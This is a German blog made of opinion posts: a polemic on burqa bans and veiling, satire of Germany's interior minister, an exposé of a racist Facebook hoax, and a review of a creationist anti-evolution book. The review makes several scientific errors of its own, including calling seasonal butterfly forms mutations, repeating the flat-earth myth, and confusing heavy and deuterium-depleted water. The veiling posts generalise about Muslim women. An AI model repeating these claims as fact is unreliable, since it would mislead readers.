Ich habe mir auch von Leuten, die den Koran, also quasi die in Worte gefasste Formelsammlung jener muslimischen Religion, erklären lassen, dass Frauen gleichberechtigt gegenüber Männern gestellt seien und es keine religiösen Zwänge geben würde, dass Frauen sich verhüllen müssten.

Jedoch ist das alles interpretationsoffen und extreme Gruppierungen wie die Salafisten besitzen hierzu deutlich andere Vorstellungen. Insbesondere Saudi- Arabien verfolgt recht restriktive Auslegungen des Koran und der Islam ist dort Staatsreligion und bestimmt das Leben der Menschen. Frauen sind in diesem Land definitiv nicht gleichberechtigt und werden zu vielen Dingen gezwungen bzw. man verwehrt ihnen die Teilhabe am gesellschaftlichen Leben. Muslimische Frauen müssen sich in der Öffentlichkeit verhüllen, sonst droht Strafe.

Ein Schnappschuss wie das folgende Bild hätte sicher dramatische Folgen zumindest für die weiblichen Badenixen.

saudische Königsfamilie
Quelle: Facebook (Bernadette Lirakis)

Pikant an dem Foto ist jedoch der  Umstand, dass es sich bei den Personen um Mitglieder der saudischen Königsfamilie handelt, die an der französischen Mittelmeerküste von ihrer Yacht aus ziemlich weltoffenes Badevergnügen zelebrieren.  Die Analogie zur Überschrift wird damit hergestellt.

Mir ist das übrigens schon wieder egal. Doch was sagen jene Frauen dazu, die angeblich aus religiösen Gründen ihren Körper in der Öffentlichkeit bedecken? Was sagen jene Frauen dazu, die gezwungen werden, sich verhüllen zu müssen?

In westlichen Kulturkreisen haben Frauen lange für ihre Emanzipation kämpfen müssen. Was würden wohl diese Frauen zu muslimischen Frauen sagen wollen, die freiwillig auf die eigene Emanzipation verzichten?

Und tatsächlich gibt es doch einen Bezug zwischen der Verschleierung der Frau und dem islamistischen Terror. Denn diese Extremisten verwenden diese Zwangsverschleierung als ein Symbol ihres selbst ausgerufenen Kalifats.  Jede Frau, die verschleiert, insbesondere in weltoffenen, demokratischen Ländern ihre Religiosität präsentiert, setzt damit ein Zeichen für diese Extremisten. Die Vollverschleierung von Frauen stellt sowohl eine Inszenierung einer restriktiven Auslegung ihrer Religion als auch eine unbewusste Instrumentalisierung durch religiöse Fanatiker dar.

Das kann und darf man anders einschätzen, jedoch hat längst der Konflikt zwischen den religiösen Fanatikern und aus deren Sicht den Ungläubigen auf einer noch gewaltfreien Ebene begonnen. Das Grundrecht auf Religionsfreiheit wird bewusst überstrapaziert, um demokratische Werte gegeneinander auszuspielen. Bereits die höchsten juristischen Instanzen beschäftigen sich in Mitgliedsstaaten der EU inzwischen mit lapidaren Kleidungsstücken.  Der politische Rechtsruck, der in der gesamten europäischen Union nicht zu ignorieren ist, bekommt auch durch diesen Konflikt ideologische Nahrung. Selbstzerstörende Elemente der Demokratie wurden längst frei gesetzt.

Share Button

Scheiß Burka(verbot)

Share Button

Natürlich sind es wieder die erzkonservativen Fundamentalisten von CDU und CSU, welchen offensichtlich die Vollverschleierung von muslimischen Frauen wichtiger erscheint als das Lösen dringlicherer Probleme in unserer Gesellschaft. Als Wahlkampfposse mit der Wirkung einer mit Wucht ins Holz getriebenen Axt, spaltet das Thema die Nation. Sei es drum, so sollen eben 2 Quadratmeter Stoff die anstehenden Landtags- und womöglich sogar die Bundestagswahl entscheiden…

Als  Burka bezeichnet man jenes Gewand, worunter sich in der Regel eine Frau verbirgt, die durch eine Art Gitter vor den Augen nur eingeschränkt die Umgebung wahrnehmen kann. Die Light- Version davon bezeichnet man als Niqab, wo immerhin die obere Gesichtshälfte um die Augen partiell zu sehen ist. Zwar ist meistens nur die Rede von einem Burka- Verbot, jedoch dürfte auch der Niqab damit gemeint sein.

Nun lautet der Artikel 4 Absatz 1 & 2 des deutschen Grundgesetzes folgendermaßen:

 (1) Die Freiheit des Glaubens, des Gewissens und die Freiheit des religiösen und weltanschaulichen Bekenntnisses sind unverletzlich.

(2) Die ungestörte Religionsausübung wird gewährleistet.

Damit hat sich der Gesetzgeber wahrhaftig ein gesellschaftspolitisches Eigentor geschossen, sofern man diese beiden Sätze völlig losgelöst aus den Kontext des Gesamtwerkes betrachtet.

Unabhängig davon, dass man einer Burka- tragenden Person nur äußerst selten in diesem Land begegnen wird, erweckt dieses scheinbar religiöse Symbol bei kulturell und gesellschaftlich anders geprägten Menschen mindestens Unbehagen. Als in den achtziger Jahren die Punker mit schrillem Outfit provokativ ihren Lebensstil zur Schau stellten, wurde das ebenfalls belächelt bis verurteilt. Mit Religion haben alle Paradiesvögel, die sich absichtlich von der Masse zumindest optisch abheben wollen, kaum bis gar nichts am Hut. Verboten hat man Ihnen das dennoch nicht.

Allerdings war es ein Zeichen von selbstbestimmter Ausgrenzung gegenüber der restlichen Gesellschaft, eher selten als Modetrend zu interpretieren. Nun kann man auch vermuten, dass die Burka bzw. der Niqab als Ausgrenzungsmittel von Muslimen gegenüber der freien, demokratischen Gesellschaft verwendet wird. Es wirkt auf viele Menschen eben so, als wollte die Trägerin einer Vollverschleierung damit zum Ausdruck bringen, dass sie sich damit dem fremden Kulturkreis entziehen möchte. Genau genommen tut sie das auch, denn damit sendet sie ein Signal aus, das entsprechend von der vorwiegend kulturell anders geprägten Umwelt gedeutet wird. Das mag sie selbst womöglich völlig anders sehen.

Tatsächlich wird nicht eindeutig jene Vollverschleierung in der muslimischen Glaubenslehre vorgeschrieben. Entweder kann die Frau selbst entscheiden, ob und wieweit sie sich verhüllt oder es wird ihr von der Familie oder dem Ehepartner auferlegt. Letzteres entspricht weder der im Grundgesetz verbrieften Religionsfreiheit noch dem Islam als Glaubensdoktrin.

Teilweise versuchen immer wieder Muslime auf Grundlage des Grundgesetzes, also des Rechtes auf freie Glaubensausübung, nicht nur das Tragen der Burka durchzusetzen. Es gab sogar schon Rechtsstreits wegen Kopftüchern, was im Prinzip albern klingt. Auch an verschiedenen Universitäten wollten Muslime bereits die Möglichkeiten des täglichen Gebetes in eigens dafür zur Verfügung gestellten Räumlichkeiten durchsetzen. Das kann man tun. Dennoch sollte man zuvor etwas darüber nachdenken, ob es sinnvoll und zielführend ist, die Grenzen eines demokratischen Rechtsstaates auszuloten. Zur freien Ausübung des Glaubens gehört auch die Vernunft, andere Menschen damit nicht zu belästigen. Es wirkt mitunter penetrant, wenn Menschen aus anderen Kulturen, wo bisweilen Demokratie lediglich ein Fremdwort darstellt und die Trennung von Kirche und Staat undenkbar wäre, auf Rechte pochen, welche sie in ihrer ursprünglichen Heimat nie zugestanden bekommen würden. In islamischen Ländern haben Anhänger anderer Glaubensbekenntnisse oft einen schweren Stand.

Dass der internationale Terrorismus vorwiegend mit dem Islam in Verbindung gebracht wird, ist nicht die Schuld des Islam, aber auch nicht die Schuld derer, die es so empfinden, weil jener Terror von den Terroristen sehr bewusst über den Islam transportiert wird. Muslime müssen es begreifen, dass nur sie diesen Terror, den sie ja selbstredend ebenfalls verurteilen, beenden können, indem sie ihre Religion harmonisieren und gegen die Auslegungen von Extremisten unantastbar machen. Das geschieht schlichtweg nicht. Dadurch suchen sich Menschen Symbole, welche den Terror, der ja weder greifbar noch vorhersehbar ist, identifizieren sollen. Die Burka als schwarzes Gewand, welches seine Trägerin in einer Anonymität verschwinden lässt, bietet sich geradezu als ein solches Feindbild an.

Es liegt in der Natur des Menschen, das Unerklärliche erklären zu wollen, das Unsichtbare sichtbar zu machen und das Unvorstellbare vorstellbar zu machen. Dafür bedient er sich seit seiner Entstehung Symbolen, Kultstätten, Fetischen oder Gottheiten. Dabei ist die Burka eigentlich nur ein eher trostloses, farbloses und unpraktisches Kleidungsstück, wovon keine reale Bedrohung ausgeht…

 

 

Share Button

Ruhig Brauner

Share Button

Ursprünglich galt diese Redewendung meist jungen, ungestümen Pferden. Hier nicht. Hier wird diese interpretationsfähige Aufforderung an all jene Homo Sapientes, die eben weniger bis gar nicht „sapiens“ sind, adressiert.

Da wäre zum Beispiel jener Thomas De Maiziere, seines Zeichens Bundesinnenminister und chronischer Zahlenverdreher. Die Flüchtlingskrise macht ihm und seinen Kabinettmitgliedern doch arg zu schaffen, um am Vokabular der Bundeskanzlerin anzuknüpfen. Denn der sowohl historische als auch gleichzeitig dämliche Spruch „Wir schaffen das“ hat sicher eines geschafft, nämlich die Bevölkerung in Gutmenschen und Besserdeutsche zu spalten. Freilich gibt es dazwischen auch noch etliche rational denkende und handelnde Menschen, jedoch weder die Medienwelt noch die hohe Politik lassen sich auf derlei vernünftige Kompromisse ein…

Dieser Herr De Maiziere hat dermaßen viel Angst vor Terrorismus, dass er glaubt, präventiv jedem Bürger in den Hosenschlitz schauen zu müssen. Er überschlägt sich förmlich, neue Gesetze und Sicherheitskonzepte zu entwickeln, ohne die bestehenden Sicherheitsmechanismen überhaupt auszuschöpfen. Wäre er ein Pferd, wäre er quasi davon galoppiert und im Sumpf stecken geblieben. Da er nicht wie einst der Baron von Münchhausen einen Zopf besitzt, kann er sich leider nicht selbst aus der misslichen Lage befreien. Allerdings könnte er trefflich mit dem Lügenbaron konkurrieren, wenn er sich in Statistiken und Studien verliert, die er im Eifer der Dringlichkeit selbst erfunden hat.

Jetzt sind nicht alle Migranten Flüchtlinge und verschwindend wenige davon Terroristen, doch bekanntlich ist es so, wenn man mit Kanonen auf Spatzen schießt, trifft man mindestens die Balkonpflanzen des Nachbarn. Als Politiker besitzt man dann immer noch die alles entscheidende Option, einen Erfolg der durchgeführten Operation heraus zu filtern. Also der gesamte Balkon war ohnehin renovierungsbedürftig oder so…

Zwar hat bislang die reaktivierte Vorratsdatenspeicherung keinen erwähnenswerten Erfolg zu verzeichnen, doch nach der Logik des Bundesinnenministers ist es dennoch ein unerlässlicher Schritt zu höherer Sicherheit. Man zerschmettert auf diese Weise nicht nur die Balkonpflanzen, sondern zukünftig auch noch das einzig verbliebene Urlaubsziel des vorsichtigen Biodeutschen, da schließlich die restliche Welt komplett durch Terroristen kontaminiert ist. Und die Spatzen pfeifen es schließlich von den Dächern…

Das Schweigen der Lämmer soll nach den Vorstellungen des Bundesinnenministers zumindest in der Ärzteschaft gebrochen werden, da schließlich jene Psychopathen, welche sich verschreibungspflichtig in die Luft sprengen, zuvor redselig dem Mediziner ihres Vertrauens offenbart haben sollen. Ritalin wird zum Indiz für Terrorgefahr. Geheimnisse dürfen zukünftig nur noch die Verhandlungspartner von transatlantischen Freihandelsabkommen besitzen. Und kaum nachdem Thomas De Maizere von diesem Irrwitz überzeugt werden konnte und die Ärzte weiterhin schweigen dürfen, finden seine Parteikollegen eben die Burka als potentiell so gefährlich, dass nicht einmal der Kampfmittelräumdienst hierbei helfen könnte.

Ist eine Abschiebungshaft für straffällig gewordene Ausländer nicht längst im Ausländerrecht etabliert? Weshalb will der Bundesinnenminister das Rad neu erfinden? Würde es nicht genügen, wenn die Behörden ihre Arbeit gewissenhaft erledigen würden?

Und letztendlich bezeichnet man mit der Farbe Braun auch eine politische Gesinnung, die immer dann entsteht, wenn man zu viele Farben miteinander mischt.

 

 

 

Share Button

Wenn Blödheit weh tun würde…

Share Button

Wenn Blödheit wehtun würde, müssten so manche Intelligenzflüchtlinge aus dem politisch ganz weit rechten Spektrum permanent laut schreien. Jetzt ist mir glatt ein Faux Pas unterlaufen. Sie schreien ja längst pausenlos in den sozialen Netzwerken.

Quelle: Facebook
Quelle: Facebook

Eine irrwitzige Geschichte verbreitet sich vorwiegend in rechtspopulistischen Kreisen.

Was würdest du tun, wenn Asylanten dein Auto besetzen?

So lautet die Überschrift und soll eine Empörung erzeugen, welche völlig fiktiv ist. Trotzdem wird der Text als Tatsachenbericht suggeriert. Im Artikel variiern gelegentlich die Örtlichkeiten und Personen, aber inhaltlich bleiben alle Varianten gleich. Selbst das Märchen vom Wolf und den sieben Geißlein scheint näher an der Realität angesiedelt zu sein als jene haarsträubende Situationsbeschreibung. Obwohl sich die jeweiligen Polizei- Dienststellen von den Schilderungen distanziert haben, finden sich immer noch Leute, welche offensichtlich keine Scheu besitzen, der eigenen Intelligenz eine Absage zu erteilen. Die Geschichte ist frei erfunden und entspringt augenscheinlich dem Hirn eines üblen Rassisten. Die Kommentare dieser Hohlbirnen sprechen für sich… (Nebenbei erwähnt, sind viele der Kommentare juristisch grenzwertig bzw. womöglich strafrechtlich relevant. Daher sind auch die Quellen nicht unkenntlich gemacht worden, falls Ermittlungsbehörden diese verwenden wollten. Außerdem stammen die Screenshots aus öffentlich zugänglichen Bereichen des (a)sozialen Netzes Facebook.)

Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook
Quelle: Facebook

Erschreckend ist jedoch, wie offen und enthemmt eine offensichtlich stetig steigende Zahl von Menschen sich an rechtsextremen Ressentiments mit Genuss abarbeitet.

Share Button

Evolution (im)possible – eine Buchrezession

Share Button

Etwas kurios kam diese Buchkritik zustande. Ich  ärgerte mich über einen Facebook- Beitrag in meiner Timelime, weil dieser zu einer Werbeanzeige führte, wo ein Buch zum Kauf angeboten wurde.

mementoDementsprechend äußerte ich mich auch abfällig über jenes Buch, welches die Evolution in Frage stellt. Der Verlag sendete mir daraufhin ein kostenloses Exemplar, um mir eine Meinung darüber bilden zu können. Das habe ich dann auch versucht…

Ich arbeitete mich chronologisch anhand von extrahierten Zitaten am Inhalt ab.

„Doch wenn der Genetiker Recht hatte und Mutationen niemals neue zweckgerichtete genetische Informationen erzeugten, dann wäre Evolution als die Ursache des Lebens auf der Erde ausgeschlossen und könnte unmöglich stattgefunden haben.“ (Seite 8)

Zunächst muss ich darauf hinweisen, dass ich natürlich nicht das nötige Fachwissen besitze, um komplexe biologische Abläufe über Millionen von Jahren erklären oder gar deuten zu können. Das muss man auch in vielen Fällen gar nicht. Es werden hier schlicht 2 Meinungen von Genetikern gegenüber gestellt. Beide können keine fundierten oder belegbaren Nachweise erbringen, dass jeweils ihre Beurteilung korrekt ist bzw. die korrektere wäre. Es wird allerdings einfach angenommen, jener Genetiker, der die Ansicht vertritt, dass „niemals“ aus Mutationen neue genetische Informationen entstehen könnten, Recht haben würde. Daraus entsteht die Schlussfolgerung und keinesfalls der Beweis, dass die Evolution nicht die Ursache für (neues) Leben auf diesem Planeten sein kann. Man beachte auch den stets verwendeten Konjunktiv, welcher eben einen fundierten Beweis ausschließt.

„Die Analyse- Ergebnisse aus dem staatlichen Forschungslabor in Neuseeland gaben ein Alter von 6600 Jahren an…“  (Seite 9)

Ein Blick in die Wikipedia (https://de.wikipedia.org/wiki/Radiometrische_Datierung) veranschaulicht, dass diese Messmethode nicht fehlerlos sein muss und im Buchtext auf eine wissenschaftliche Redundanz der Ergebnisse nicht eingegangen wird, diese somit auch nicht zwingend durchgeführt worden sind. Gerade wenn eklatante Zweifel entstehen, wäre es doch von hohem Interesse, die Messergebnisse entsprechend zu verifizieren?

Auf Seite 10 folgt dann die Behauptung: „Die Schöpfung ist ein Akt Gottes“

Bereits die Überschrift von Kapitel 1 („Aber ist die Evolutionstheorie nicht bewiesen?“) vermittelt einen falschen Ansatz. Es handelt sich um eine Theorie, was eben keinen Beweis darstellt. Wikipedia hilft dabei erneut: „Eine Theorie ist ein System von Aussagen, das dazu dient, Ausschnitte der Realität zu beschreiben beziehungsweise zu erklären und Prognosen über die Zukunft zu erstellen.“

Es behauptet folglich niemand, dass die Evolutionstheorie Tatsachen liefert, bestenfalls plausible Erklärungen. Auch darf man die Begriffe „Evolution“ und „Evolutionstheorie“ niemals gleich setzen. Das scheint mir Dr. Ashton nicht ausreichend zu berücksichtigen.

„Aber ich habe bislang keine seriöse wissenschaftliche Ausarbeitung gefunden, welche einen belegten Mechanismus beschreibt, wie aus leblosen Molekülen eine lebende Zelle entstanden sein könnte.“ (Seite 14)

So gehen beispielsweise Verschwörungstheoretiker vor, wenn sie Zweifel an zwar allgemein anerkannten Gegebenheiten streuen möchten, aber selbst nicht in der Lage sind, den Beweis für ihre eigene Theorie liefern zu können. Man will damit die Gegenseite nötigen, ihren Beweis zu liefern, um damit die eigene Position als richtig darzustellen. Denn man weiß (hofft), dass zum gegenwärtigen Zeitpunkt dieser Beweis nicht erbracht werden kann. Man darf aber als unabhängiger Betrachter zweier unterschiedlicher Ansichten nicht dieser geschickten Manipulation erliegen.

An dieser Stelle nenne ich gerne das Beispiel des Jahrhunderte alten Dogmas, die Erde sei eine Scheibe. Es war schlicht vom wissenschaftlichen Fortschritt nicht möglich, den Gegenbeweis zu erbringen. Heute werden Leute belächelt, welche immer noch glauben, dass die Erde eine Scheibe wäre, während es vor diesem Beweis genau umgekehrt war.

„Die weitverbreitete Behauptung, dass die Evolution eine bewiesene Tatsache sei, wurde nicht nur nicht bestätigt, sondern es gab im Gegenteil veröffentlichte Artikel, welche sie widerlegten.“ (Seite 15)

Der Autor folgt weiter beharrlich seiner Strategie, die eigene Position dadurch zu festigen, indem er Unstimmigkeiten in der Gegenseite offenbart. Dabei verzichtet er jedoch auf jegliche Fakten, welche die Evolution in ihrer Gesamtheit als Trugschluss der Wissenschaft entlarven. Man darf nun ebenfalls schlussfolgern, dass ihm dies nicht gelingen würde und er deswegen absichtlich darauf verzichtet.

Ich versuche an dieser Stelle als Laie einen faktisches Beispiel aus der Natur zu erläutern, was keineswegs einen Beweis für die Evolution bzw. deren Theorie liefern soll, aber zumindest den Nachweis erbringt, dass äußere Einflüsse auf ein Lebewesen, dessen Entwicklung beeinflussen können. Es gibt in Mitteleuropa den Schmetterling Araschnia levana (Landkärtchen), welchen es in zwei unterschiedlichen Erscheinungsformen gibt. Im Frühjahr existiert eine größtenteils orangefarbene Spezies, während im Spätsommer eine deutlich dunkler gefärbte 2. Generation aus den Eiern und Raupen der 1. Generation entsteht. Das ist abhängig von der Tageslänge und kann unter geringen Laborbedingungen ohne Eingriffe in den Organismus nachgezüchtet werden. Es genügt quasi, die Lichtbedingungen bzw. jahreszeitlichen Bedingungen nachzustellen, um die gewünschte Variante zu züchten. Diese optische Verändrung des Schmetterlings ist reproduzierbar und liefert zumindest den Beweis, dass Mutationen in der Natur vorkommen und auch durch Einflüsse in der Natur gesteuert werden.

Dr. Ashton führt selbst auf Seite 18 und 19 die wissenschaftliche Arbeit von Dr. Kirschner und Prof. Gerhart auf, um eigentlich dieses kleine Experiment mit dem Schmetterling ignorieren zu können, weil zwar die Möglichkeit der Veränderung nachgewiesen werden kann, aber nicht, worin diese Möglichkeit ihren Ursprung besitzt. Bis hierin stützt sich Dr. Ashtons Gegentheorie ausschließlich auf der Nichtbelegbarkeit eines ursprünglichen Kernprozesses der Evolution. Das ist irgendwie nicht viel, dennoch erwartet er, dass man deswegen die komplette Evolution in Zweifel zieht.

Das erste Kapitel schließt mit dem Satz:

„Doch bevor wir weitere Beweise gegen die Evolution erörtern, wollen wir uns im nächsten Kapitel zunächst einmal Darwins Theorie näher anschauen.“

Hierzu wäre anzumerken, dass Dr. Ashton nicht einen einzigen Beweis gegen die Evolutionstheorie bis dahin erbracht hat. Er hat lediglich mögliche Fehler in dieser Theorie aufgegriffen, um damit plausible Schlussfolgerungen zu ziehen, welche aber keineswegs das Gegenteil, also im Prinzip die göttliche Schöpfungsgeschichte, nachweisen könnten…

In Kapitel 2 möchte ich lediglich auf eine Auffälligkeit eingehen, da dort im Prinzip nur die Evolutionstheorie nach Darwin behandelt wird, ohne tatsächlich stichhaltige Fakten für eine völlig falsche Erklärung der Entstehung und Weiterentwicklung des Lebens nennen zu können.

„Wenn sich allerdings in einer 3,5 Milliarden Jahre andauernden Evolution als letzte kleine Stufe der Mensch vom Schimpansen entwickelt haben soll, würde man von der Intuition her erwarten, dass die Übereinstimmung der DNA eher 99,99% betragen müsste. 4% Unterschied sind relativ hoch und sprechen eher dafür, dass hier derselbe intelligente Designer am Werk war.“ (Seite 27)

Dr. Ashton schlussfolgert erneut, ohne selbst konkret den angeblich erkannten Fehler aufzeigen zu können. Denn eine Intuition ist alles andere als wissenschaftlich. Erstmals bringt er allerdings mit dem Begriff „Designer“ eine eigene Komponente ein. Das macht neugierig…

Auf Seite 9 wurde noch die radiometrische Datierungsmethode als vermeintlichen Nachweis gegen die Evolution eingebracht, um auf Seite 32/33 plötzlich für das Gegenteil herhalten zu müssen:

„Die Folge ist, dass radiometrische Datierungsmethoden ernsthafte Probleme aufweisen können und möglicherweise absolut „verrückte“ Phantasieresultate produzieren.“

In Kapitel 4 wird viel über Evolutionstypen erklärt und fabuliert, wobei ich zugeben muss, nicht hinreichend Expertise auf diesem Gebiet zu besitzen, um ernsthaft mitreden zu können. Für mein subtiles Verständnis ausreichend zu erfassen ist die Schlussfolgerung, dass Evolutionstyp 3 bislang nie nachgewiesen werden konnte, allerdings die Basis für die Darwin’sche Evolutionstheorie bildet.

Verstrickt man sich weniger in komplizierte Berechnungen und Plausibilitäten und nimmt weder die Evolutionstheorie noch eine andere, bislang im Buch nicht behandelte Möglichkeit der Entstehung und Veränderung von Leben als gegeben an, eröffnet dies eine objektivere Betrachtungsweise. So steht der Autor auf den Standpunkt, dass Typ 3 der Evolution nicht nachgewiesen werden kann. Da Dr. Ashton also aufgrund diverser durchgeführter Experimente der Ansicht ist, dass ein bestimmter Organismus nicht zu einem neuen mutieren kann, jedenfalls nicht durch die Evolutionstheorie erklärbar oder gar nachweisbar ist, darf man schlussfolgern, dass er eine andere Erklärung dafür hat. Aber selbst bis zur Seite 59 findet man absolut nichts dergleichen. Er hält starr an seiner These fest, dass eine fehlerbehafte Theorie zwangsläufig eine andere, vielleicht seine eigene, richtig werden lässt, ohne deren Fehler nur ansatzweise in Frage zu stellen.

In Kapitel 5 seines Buches widmet sich Dr. Ashton intensiv den mehr oder weniger wissenschaftlichen Erkenntnissen, wie die Zeitachse der Erde nicht unbedingt den Tatsachen entsprechen muss. Er zweifelt die Datierungen anhand von Fossilienfunde ebenso an wie die angewendete Methodik. Das mag sogar eine durchaus imposante Ungenauigkeit vermuten lassen, aber entkräftet bei weitem nicht die Evolution als solche. Störend empfinde ich bei seinen Erklärungsversuchen die Tatsache, dass er selbst Theorien anderer Wissenschaftler ausschließlich mit eigenen Theorien, welche allesamt ebenfalls keine Beweiskraft besitzen, zu entkräften versucht.

„Dieser Fund von weichem Gewebe in einem Dinosaurierfossil, das nach der geologischen Zeittafel in 80 Millionen Jahre altem Gestein gefunden wurde, ist ein stichhaltiger Beweis dafür, dass das Gestein und die Fossilien der geologischen Säule, keine Millionen Jahre alt sein können. Es ist ebenfalls ein Beweis dafür, dass die Evolution niemals stattgefunden hat.“ (Seite 86)

Endlich kommt Dr. Ashton zur Sache und entlarvt sich damit selbst. Weil ein augenscheinlicher Fehler in einem auf Schätzungen, Berechnungen und Schlussfolgerungen basierendem Modell, welches er übrigens selbst 86 Seiten lang vehement kritisiert, Erkenntnisse hervorbringt, welche kaum oder gar nicht einzuordnen sind, erklärt er damit die Evolution als gescheitert und nicht existent. Dass es allerdings all jene Fossilienfunde und Gesteinsproben gibt, scheint ihn dabei nicht zu stören. Trotzdem beschreibt er selbst diverse Lebewesen in unterschiedlichen Zeitepochen, obwohl er genau diese Dinge in Frage stellt.

„Mit anderen Worten gesagt, war einiges, was in der Literatur als Evolution gedeutet wurde, lediglich das Ergebnis davon, dass präexistente genetische Information verloren gegangen ist und nicht das Resultat von neuer genetischer Information, die irgendwie durch Zufall entstanden ist.“ (Seite 90)

In der Literatur (https://de.wikipedia.org/wiki/Evolution) findet man als Definition der Evolution beispielsweise diese Aussage in der Wikipedia:

Evolution (von lateinisch evolvere „entwickeln“) ist die allmähliche Veränderung der vererbbaren Merkmale einer Population von Lebewesen von Generation zu Generation. Zu den Forschungsgebieten der Evolutionsbiologie gehören sowohl die Evolutionsgeschichte, in der die Veränderungen der Lebewesen im Laufe der Erdgeschichte beschrieben werden, als auch die Erklärungen für die Evolution durch die Evolutionstheorien.

Dr. Ashton begeht einen elementaren Fehler, indem er pauschal auf „die Literatur“ verweist. Nicht die verschiedenen Interpretationen eines Sachverhalts sind entscheidend für dessen Korrektheit oder Fehlerquote, sondern der Sachverhalt selbst. Nimmt man die Beschreibung in der Wikipedia zum Beispiel als Maßstab für seine Behauptung, liegt Dr. Ashton erwiesenermaßen falsch. Denn es wird von Veränderungen gesprochen und keineswegs behauptet, dass neue genetische Informationen zufällig entstanden sind.

Dr. Ashton versteift sich darauf, dass Evolution unbedingt mit der Veränderung von genetischen Code zu tun haben muss. Wieso eigentlich? Allein die Anpassung an neue Lebensräume und Bedingungen könnte man bereits als Evolution betrachten. Der Mensch wird nachweislich immer größer. Der menschliche Körper wächst im Durchschnitt über die Jahrhunderte. Bleibt man einfach bei diesem Faktum, wie soll man es anders nennen als Evolution?

Auch versucht Dr. Ashton permanent anhand von diversen Lebewesen wie Haien oder Krebsen überzeugen zu wollen, dass es keine Evolution gibt, weil diese Tiere sich über Millionen Jahre hinaus quasi nicht verändert hätten. Das Beispiel des Schmetterlings greife ich gerne erneut auf, der sich in seinem Lebenszyklus, welcher unter Umständen nur wenige Wochen betragen kann, außergewöhnlichen Veränderungen unterworfen ist. Aus einer gedrungen Raupe entwickelt sich eine fast unbewegliche Puppe, woraus ein fliegendes Insekt entschlüpft. Wie könnte man den Begriff „Mutation“, welchen Dr. Ashton gerne im Zusammenhang mit einer nicht möglichen Evolution verwendet, besser darstellen? Was wäre, wenn Dr. Aston stattdessen den Begriff „Metamorphose“ verwenden würde?

In Kapitel 8 taucht Dr. Ashton schließlich und endlich in die Mythologie- und Sagenwelt ein und möchte anhand von Überlieferungen großer Flutkatastrophen tatsächlich einen wissenschaftlichen Beleg für die Schöpfungsgeschichte konstruieren. Dabei ähneln sich alle Überlieferungen aus verschiedenen Regionen nur in einem einzigen Punkt: Es gab eine große Flut und viele Lebewesen kamen darin um. Die jeweiligen Interpretationen dieser Geschichten unterscheiden sich erheblich.

„Die Geschichte aus dem alten Indien erzählt von Manu, den ein Fisch vor einer Flut warnte, welche die ganze Menschheit zerstören würde. Ihm wurde aufgetragen, ein Schiff zu bauen, welches der Fisch während der Flut an einen Landeplatz auf einem Berggipfel bringt.“

Es irritiert doch erheblich, dass Dr. Ashton bis zum Kapitel 8 penibel wissenschaftliche Schlussfolgerungen und Erkenntnisse gegenüber stellt, um Unzulänglichkeiten heraus pflücken zu können und stützt seinen Gegenbeweis auf abenteuerliche Geschichten aus Zeiten, wo man die Erde noch als Scheibe begriff und die Menschen sich ihre eigenen Gedanken über den Sinn und die Entstehung des Lebens abseits wissenschaftlicher Erkenntnisse herbei philosophierten. Wie stellt man sich die Kommunikation zwischen einem Fisch und einem Menschen vor, wo es um den Untergang der Welt geht? Auch in der biblischen Geschichte baute ein einziger Mann namens Noah mit bestenfalls wenigen Familienmitgliedern ein seetaugliches Schiff für Passagiere, die niemals auf engem Raum miteinander auskommen würden. Wie ernährten sich beispielsweise die fleischfressenden Tiere an Board über Monate? Wenn alle Lebewesen, die es damals gegeben haben soll, auf Noah’s Arche angewiesen waren, um überleben zu können, muss dieses Schiff gewaltig gewesen sein. Man könnte endlos viele Fragen stellen, wie dieses gigantische Unterfangen funktioniert haben soll und wird permanent auf Widersprüche treffen, die mit Logik, der Physik und weiteren wissenschaftlichen Aspekten nicht erklärt werden können. Gleichzeitig stört sich aber Dr. Ashton an Gesteinsschichten, die nicht wissenschaftlich korrekt datiert werden können.

„Weitere Beweise für die Glaubwürdigkeit des Sintflutberichts scheinen in den piktographischen Symbolen einer alten chinesischen Schrift erhalten geblieben zu sein.“ (Seite 126)

Dr. Ashton traut sich tatsächlich hierbei von Beweisen zu reden. Er legt großen Wert darauf, dass Vorkommnisse, also primär jene Sintflut, zeitlich sehr nahe beieinander liegen müssen. Hierbei fällt auf, dass sich aus einer geringen Zahl überlebender Menschen, explosionsartig etliche imposante Kulturen entwickelt haben, welche sich sogar quasi blitzschnell über weite Teile der Welt verbreitet haben. Im Vergleich zum Erdzeitalter (ca. 4,3 Milliarden Jahre) und der damit verbundenen Evolution, war die Entwicklung der Menschheit aus einer Handvoll überlebender Bauern zu vielen hochentwickelten Metropolen weniger als ein Augenzwinkern. Da ist tatsächlich ein starker Glaube an eine höhere Macht dringend erforderlich.

„Forscher vom Hungary Central Research Institute für Physik und die Semmelweis University für Medizin berichten ebenfalls, dass das Wachstum von Krebs verlangsamt wird oder gar ganz aufhört durch Deuteriumoxid entleertes Wasser.“ (Seite 132)        

Ob sich Dr. Ashton mit dieser Aussage vergaloppiert hat, kann ich nicht beurteilen. Er unterschlägt jedenfalls womöglich vorsätzlich, dass Deuteriumoxid (schweres Wasser) neben der möglicherweise positiven Wirkung auf Krebserkrankungen daneben grundsätzlich leicht toxisch ist und die Nebenwirkungen schlimmer sind als die mögliche Heilung von Krebs. Dennoch will er damit den Beweis für das angeblich hohe Lebensalter von vorsintflutlichen Königen und Herrschern ableiten, welche nach dem Alten Testament (Genesis) mehrere 100 Jahre alt geworden sein sollen. In anderen, nicht näher beschriebenen Überlieferungen sollen diese Könige sogar mehrere 1000 Jahre alt geworden sein. Das zwar nicht wissenschaftlich nachweisbare hohe Alter dieser etwa 8 Personen wiederum soll darauf zurückzuführen sein, dass zur damaligen Zeit schweres Wasser anstatt wie heutzutage leichtes Wasser überwiegend Bestandteil der Nahrungsaufnahme war. Und damals quoll jenes schwere Wasser tief aus der Erde empor, wenn man der Genesiserzählung glauben möchte. Verwunderlich erscheint dabei, wieso ausgerechnet und ausschließlich nur jene 8 Könige so alt geworden sein sollen und nicht die restliche Bevölkerung ebenfalls? Das scheint für Dr. Ashton auch nicht wichtig und schon gar nicht nützlich zu sein, denn er sucht damit verzweifelt nach einer Erklärung, dass die Menschen in dieser Zeit bessere Gene besessen haben sollen und will damit sogar den Nachweis erbringen, dass die DNA heute lebender Menschen überlebenswichtige Informationen verloren haben muss. Seine Thesen sind abenteuerlich und seine Beweisketten stützen sich auf fragilen Erzählungen, deren Wahrheitsgehalt nie nachgewiesen werden konnte.

